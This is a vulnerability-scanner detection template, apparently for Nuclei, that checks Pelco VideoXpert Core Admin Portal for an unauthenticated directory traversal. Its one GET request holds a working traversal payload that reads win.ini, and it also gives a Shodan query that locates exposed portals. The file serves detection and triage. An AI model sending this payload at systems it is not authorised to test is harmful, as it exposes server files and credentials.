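# Detection template for an unauthenticated file read in the Pelco VideoXpert
# Core Admin Portal. It sends a single GET request and reports a finding only
# when the response is HTTP 200 and the body carries all three win.ini markers
# listed under `matchers`.
id: videoxpert-lfi

info:
  name: Schneider Electric Pelco VideoXpert Core Admin Portal - Local File Inclusion
  author: 0x_akoko
  severity: high
  # The name and description call this "local file inclusion"; the references
  # and the CWE classify it as directory traversal (arbitrary file read).
  description: Schneider Electric Pelco VideoXpert Core Admin Portal suffers from local file inclusion. Exploiting this issue will allow an unauthenticated attacker to view arbitrary files within the context of the web server.
  # Generic guidance only: the template does not record a fixed release, so
  # confirm the patched version against the referenced advisories.
  remediation: >-
    Apply the vendor's security update for VideoXpert Core where available,
    and restrict access to the Admin Portal to trusted management networks.
  reference:
    - https://packetstormsecurity.com/files/143317/Schneider-Electric-Pelco-VideoXpert-Core-Admin-Portal-Directory-Traversal.html
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5419.php
  classification:
    # Network-reachable, no privileges or user interaction, confidentiality
    # impact only: consistent with an unauthenticated file read.
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    # Was "CWE-22Directory-Traversal.html": the tail of the first reference
    # URL had been fused onto the identifier.
    cwe-id: CWE-22
  metadata:
    max-request: 1
    shodan-query: title:"VideoXpert"
  tags: schneider,pelco,packetstorm,lfi,videoxpert

http:
  - method: GET
    path:
      # Single-quoted so YAML passes the backslashes through unchanged.
      # The request only reads win.ini; it does not modify the target.
      - '{{BaseURL}}/portal//..\\\..\\\..\\\..\\\windows\win.ini'

    # Both matchers must pass, so error pages and soft-404s are not reported.
    matchers-condition: and
    matchers:
      # All three strings are required: part of the comment line at the top of
      # a stock win.ini plus two of its section names. Requiring them together
      # keeps a page that merely echoes the requested path from matching.
      - type: word
        part: body
        words:
          - 'bit app support'
          - 'fonts'
          - 'extensions'
        condition: and

      - type: status
        status:
          - 200

# Triage: a match means files readable by the web server account were exposed
# without authentication. Review the portal's access logs for traversal
# sequences in /portal/ requests and treat configuration and credentials stored
# on that host as potentially disclosed.
# NOTE(review): the digest below was not recomputed for the edits above, so
# re-sign the template before relying on signature verification.
# digest: 490a0046304402203216377d842f5674d546daea27a242aa678ba12656b7a9080f76071adbb5d9a5022063815ab18c5c589bd4d55bb61b6dc1598392d2e60b33c0f7b0851feac3245542:922c64590222798bb761d5b6d8e72950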